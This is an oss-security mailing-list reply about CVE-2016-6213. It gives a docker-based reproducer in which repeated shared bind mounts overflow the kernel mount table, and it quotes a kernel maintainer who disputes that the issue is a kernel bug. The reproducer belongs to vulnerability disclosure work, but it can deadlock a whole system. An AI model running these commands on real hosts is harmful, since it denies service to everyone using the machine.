Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount

[CAI Qian <caiqian () redhat com>]

Maybe this is a better reproducer using docker. It is exploitable even with
user namespace enabled.

# docker run -it -v /mnt/:/mnt/:shared --cap-add=SYS_ADMIN rhel7 /bin/bash

# cat /proc/self/uid_map 
         0        995      65536

# cat /proc/self/gid_map 
         0        992      65536

(insider container) # for i in `seq 1 20`; mount -o bind /mnt/1 /mnt/2; done
   CAI Qian

----- Original Message -----
> From: "Greg KH" <greg () kroah com>
> To: oss-security () lists openwall com
> Cc: caiqian () redhat com, cve-assign () mitre org
> Sent: Wednesday, July 13, 2016 6:45:00 PM
> Subject: Re: [oss-security] Re: cve request: local DoS by overflowing kernel mount table using shared bind mount
>
> On Wed, Jul 13, 2016 at 12:59:40PM -0400, cve-assign () mitre org wrote:
> > > It was reported that the mount table expands by a power-of-two
> > > with each bind mount command.
> >
> > > If the system is configured in the way that a non-root user
> > > allows bind mount even if with limit number of bind mount
> > > allowed, a non-root user could cause a local DoS by quickly
> > > overflow the mount table.
> >
> > > it will cause a deadlock for the whole system,
> >
> > > > form of unlimited memory consumption that is causing the problem
> >
> > Use CVE-2016-6213.
>
> A CVE for an "improperly configured system"?  Huh?  What distro has such
> a configuration set by default?  This isn't a kernel bug, so what is
> this CVE classified as being "against"?  It better not be against the
> Linux kernel...
>
> confused,
>
> greg k-h